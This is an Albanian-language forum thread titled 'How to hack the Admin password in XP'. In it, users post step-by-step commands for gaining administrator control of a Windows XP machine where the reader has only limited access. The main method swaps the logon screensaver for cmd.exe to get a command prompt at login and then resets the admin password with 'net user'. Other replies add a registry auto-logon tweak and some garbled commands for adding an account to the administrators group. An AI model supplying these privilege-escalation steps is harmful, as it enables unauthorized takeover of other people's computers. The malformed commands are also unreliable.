• Përshëndetje Vizitor!

    Nëse ju shfaqet ky mesazh do të thotë se ju nuk jeni regjistruar akoma. Edhe pse nuk jeni regjistruar ju arrini të shihni pjesën me të madhe të seksioneve dhe diskutimeve të forumit, por akoma nuk gëzoni të drejten për të marrë pjesë në to dhe në avantazhet e të qënurit anëtar i këtij komuniteti. Ju lutem : REGJISTROHUNI që të dërgoni postime dhe mesazhe në Forum-Al.

    Regjistrohu !

Si te beni hack passwordin e Admin ne XP

Geri

half man, half amazing
Staff member
Morning Star
Anëtar
Feb 9, 2009
Postime
2,712
Pikët
113
Vendndodhja
Tirane
Neqoftese keni access te limituar ne nje Pc dhe doni te merrni access Admin hapni dos prompt dhe beni komandat e meposhtme:

cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit


Beni restart Pc.
Pasi Pc ndizet do tju dale perseri dos prompt. Beni komanden e meposhtme:


net user <emri i accountit admin> password

Neqoftese emri i accountit admin eshte pershembull "cr0n" dhe passwordin e doni 123456 komanda duhet te jete e tille:

"net user cr0n 123456"

Me kaq perfundon :D
 

Geri

half man, half amazing
Staff member
Morning Star
Anëtar
Feb 9, 2009
Postime
2,712
Pikët
113
Vendndodhja
Tirane
Titulli: Si te beni hack passwordin e Admin ne XP

Edhe nje menyre tjeter sesi mund te merrni admin kontrol ne windows :)

Modifikoni vleren e mposhtme ne regedit.exe dhe beni restart PC :D

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
 

ariannn

Anëtar i ri
Anëtar
Feb 16, 2009
Postime
34
Pikët
0
Titulli: Si te beni hack passwordin e Admin ne XP

cmd,type:net user Emri 1234] add/ (enter)
type:net localgroup administrator Emri add/ (enter)
 
Top